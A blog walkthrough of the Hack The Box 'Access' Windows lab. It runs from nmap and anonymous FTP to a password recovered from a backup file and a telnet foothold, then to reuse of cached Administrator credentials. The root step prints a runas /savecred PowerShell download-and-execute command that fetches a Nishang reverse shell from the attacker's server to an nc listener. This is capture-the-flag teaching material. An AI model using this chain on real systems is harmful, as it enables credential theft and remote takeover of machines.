Access - Hack The Box

Shawn NewmanShawn Newman
5 min read

Access is an easy difficulty Windows machine that begins with leveraging anonymous FTP access to obtain credentials and gain an initial foothold. Further local enumeration uncovers stored administrator credentials, which are then used to establish a reverse shell with administrative privileges.

User Flag:

Initial Enumeration:

sudo nmap -sC -sV -vv 10.10.10.98

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-24 15:43 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
Initiating Ping Scan at 15:43
Scanning 10.10.10.98 [4 ports]
Completed Ping Scan at 15:43, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:43
Completed Parallel DNS resolution of 1 host. at 15:43, 0.00s elapsed
Initiating SYN Stealth Scan at 15:43
Scanning 10.10.10.98 [1000 ports]
Discovered open port 21/tcp on 10.10.10.98
Discovered open port 80/tcp on 10.10.10.98
Discovered open port 23/tcp on 10.10.10.98
Completed SYN Stealth Scan at 15:43, 6.98s elapsed (1000 total ports)
Initiating Service scan at 15:43
Scanning 3 services on 10.10.10.98
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 15:45 (0:00:43 remaining)
Completed Service scan at 15:45, 163.63s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.98.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:45
NSE: [ftp-bounce 10.10.10.98:21] PORT response: 501 Server cannot accept argument.
Stats: 0:02:51 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 13 (12 waiting)
NSE Timing: About 96.95% done; ETC: 15:46 (0:00:00 remaining)
Completed NSE at 15:46, 14.26s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 1.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
Nmap scan report for 10.10.10.98
Host is up, received echo-reply ttl 127 (0.081s latency).
Scanned at 2025-07-24 15:43:09 EDT for 186s
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON          VERSION
21/tcp open  ftp     syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet? syn-ack ttl 127
80/tcp open  http    syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.56 seconds
           Raw packets sent: 2005 (88.196KB) | Rcvd: 8 (336B)

The Nmap scan identified three open services—FTP, Telnet, and HTTP. Notably, the FTP service allows anonymous authentication.

Anonymous FTP Access:

ftp 10.10.10.98

After authenticating anonymously, two directories are visible, each containing files that can be downloaded and reviewed.

get backup.mdb

get Access\ Control.zip

Attempting to extract the Access Control archive prompts for a password we don’t yet possess. Instead, we pivot to analyzing the backup.mdb file. For files like this, running the strings utility is a quick way to surface human readable data—particularly useful when hunting for embedded credentials or other sensitive information.

strings backup.mdb

Running strings on the file exposes several human readable candidates for the ZIP password. The value that stands out is "access4u@security".

Let’s attempt to extract the contents of the zip file using this password.

We’ve obtained a .pst (Personal Storage Table) file which is Microsoft Outlook’s format for storing mail. To examine its contents, we can installpst-utils and use readpst to convert or extract the messages for review.

sudo apt install pst-utils

readpst Access\ Control.pst

There should now be a .mbox file that we are able to read.

cat Access\ Control.mbox

Reading the file reveals a password for the security account.

Logging in as security:

Revisiting the initial Nmap results, Telnet is accessible and can be leveraged to obtain an interactive shell on the host.

telnet 10.10.10.98

Once logged in we can grab the user.txt flag located on the desktop of the security user.

Root Flag:

After initial enumeration, I identified a promising privilege escalation vector. A consistent “quick win” is to hunt for stored credentials which is something that should always be on your checklist. You can do this with the following command:

cmdkey /list

The enumeration results reveal cached Administrator credentials. By leveraging these, you can invoke runas to execute a Nishang reverse shell payload and establish an elevated session.

Lets start off by cloning the nishang repository.

git clone https://github.com/samratashok/nishang.git

After cloning the repository, copy Invoke-PowerShellTcp.ps1 into a separate directory you’ll serve (e.g., via a simple HTTP server) so the target can download it directly.

cp /home/kali/tools/nishang/Invoke-PowerShellTcp.ps1 ~/home/kali/htb/Access

Modify the Invoke-PowerShellTcp.ps1 script to specify your attacker machine’s IP address (and desired listener port) so the reverse shell initiates a direct connection back to you.

sudo vi Invoke-PowerShellTcp.ps1

At the bottom of the file place the following snippet:

Invoke-PowerShellTcp -Reverse -IPAddress <IP HERE> -Port 9001

Now host this file using python’s simple http server

python3 -m http.server

Open a second terminal and start a Netcat listener to catch the incoming reverse shell from the Administrator context.

nc -lvnp 9001

Finally, from the compromised security user session, issue a web request that retrieves and executes the reverse shell script, causing it to run under the Administrator context.

runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://IP HERE:8000/Invoke-PowerShellTcp.ps1')"

You should receive a connection back as the administrator account.

From this point you can grab the root.txt file from the Administrators Desktop.

0
Subscribe to my newsletter

Read articles from Shawn Newman directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#HackTheBox

Written by

Shawn Newman
Shawn Newman